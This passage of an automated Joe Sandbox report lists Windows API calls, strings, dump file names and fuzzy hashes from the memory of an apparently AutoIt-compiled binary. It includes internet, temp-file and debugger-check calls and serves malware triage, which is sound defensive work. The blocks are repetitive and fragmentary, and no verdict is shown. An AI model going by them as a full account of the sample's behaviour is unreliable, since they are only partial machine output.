                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 5cbee378d825dea020b036054a29674b7b6c1de09e81751e9666861d36dbaee3
                                                                                                                                                                                                                                                                            • Instruction ID: c076f503be96050fed7609c61a8f5c370333e60c9509d5b01ca94bc4de981595
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cbee378d825dea020b036054a29674b7b6c1de09e81751e9666861d36dbaee3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 925139714087489BD320AF14DC86BBFB7E8FF95704F81489DF2D9421A1DB708569CB66
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                            • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                            • Opcode ID: 30f4a587a0f18e95ae0b095c4f39d4ea3026f60df2d2cb748623b06c6881fcd6
                                                                                                                                                                                                                                                                            • Instruction ID: cd6ce7057af43966fae2532f150350801c72f3375d99b8a3b8277502e98595b0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30f4a587a0f18e95ae0b095c4f39d4ea3026f60df2d2cb748623b06c6881fcd6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641E271A006199FCB04DFA5C8829FEBBF5FF58324F108069E51AA7252E7709E81CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C6DB75
                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C6DB7F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                            • Opcode ID: 31acad43944ecf7fcb2457bc51b7f039302acf6d56b55fd43234e52a994ff443
                                                                                                                                                                                                                                                                            • Instruction ID: 9d8109523622b279255b7f6e249110f7c3a01777997713bac8ea24237eb7210a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31acad43944ecf7fcb2457bc51b7f039302acf6d56b55fd43234e52a994ff443
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C315971D01109ABCF15EFA0CC85AEEBFB8FF08344F000069F919A6166EB719A06DB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00C840BD
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C840F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                            • Opcode ID: 3a697147a8b7bdc55f9fde59e7ff2e9516d06db2328e7c999c5aff782c049aa3
                                                                                                                                                                                                                                                                            • Instruction ID: a96c6f10eb8bf3660ae04465e416d9628a4d7b473eb7e3a030fbc4451f76a0ea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a697147a8b7bdc55f9fde59e7ff2e9516d06db2328e7c999c5aff782c049aa3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88319E71100605AADB24EF68CC80FFB73A9FF48768F008619FAA587190DB71AD81DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00C850BD
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C850D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                            • Opcode ID: bebd101acc093bdf0106d518dd7757b4f40b182ac7dc6477f21d78c2ec4dfbbb
                                                                                                                                                                                                                                                                            • Instruction ID: 5316ca7b088ef62f05812276187964ced89e0e33efe67ad548fc95b60aefb922
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bebd101acc093bdf0106d518dd7757b4f40b182ac7dc6477f21d78c2ec4dfbbb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0311974A0170A9FDB14DFA9C980BDE7BB5FF49304F10406AE904AB391D7B1AA45CF94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF78B1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: GetStockObject.GDI32(00000011), ref: 00BF78C5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF78CF
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C84216
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00C84230
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                            • Opcode ID: 85f40d42ca8ffedab9b904930bad3fcbe1a7bed9ea47b40d170fb76a509fbf65
                                                                                                                                                                                                                                                                            • Instruction ID: 92b8454d7a83839bd63a8057f4a1dd9e09e7012f4c0b1560256a062ec3a98f84
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f40d42ca8ffedab9b904930bad3fcbe1a7bed9ea47b40d170fb76a509fbf65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 341129B261020AAFDB00EFA8CC45AFE7BE8EB08358F014514FD65D3150D634E8519B54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C6D7C2
                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C6D7EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                            • Opcode ID: 9399a9f29bbdebaba9ac1f8261e06d38f555df11a86fa62dec13ef2d5820ff3a
                                                                                                                                                                                                                                                                            • Instruction ID: 65af97d9c25c42da8a4ea381ff1c531cb07bc4d3e17c4117a797f0c0172f8743
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9399a9f29bbdebaba9ac1f8261e06d38f555df11a86fa62dec13ef2d5820ff3a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10110271B01232BED7344B628CC9FE7BE9CEB127A4F00422AB51A92184D2649940D2F2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00C5761D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C57629
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                            • Opcode ID: e8eff67670d2bf19ebd0bce4fcaae2335505fdd1eba454f4edd814b2e7e7c52b
                                                                                                                                                                                                                                                                            • Instruction ID: f3337b1a12446cb3e4f526dcd3037096c18881754b9fece9d3d8c86049309759
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8eff67670d2bf19ebd0bce4fcaae2335505fdd1eba454f4edd814b2e7e7c52b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F01C43660492A8BCB109EBDEC50DBF77B5AB607517500624F83193191EF35DAC89694
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C52699
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 68d8fa2bbc554258f9ba9f5794c2986897ca24800db551cecdbf118f0b0840df
                                                                                                                                                                                                                                                                            • Instruction ID: c6a9d1ce5fb037e73bc722c1fbe6db1250c32e8fd92d31dd77b4ae5ea2279918
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d8fa2bbc554258f9ba9f5794c2986897ca24800db551cecdbf118f0b0840df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9801F179640218ABCB08ABA0CC41CFE33F8EF46321B400629B832932C1EF31594C9658
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C52593
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 4ca4c031584a3fdc5fd086a9fe6496e473d9c17b49976b1cf868179c49496b44
                                                                                                                                                                                                                                                                            • Instruction ID: f2bb558382575cce9a30c68947da64037342008aeded830a073eeec6b0b2766e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ca4c031584a3fdc5fd086a9fe6496e473d9c17b49976b1cf868179c49496b44
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D01A7796401087BCB08EB90C962EFF77E8DF46342F9000297D12A3281EB109E4C97B9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C52615
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C52720
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C5146F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C110E2,?,?,?,00BF100A), ref: 00C0FAD9
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C110E6
                                                                                                                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C110F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C110F0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C639F0
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C63A05
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C82E08
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00C82E0F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5F292: Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C82DC8
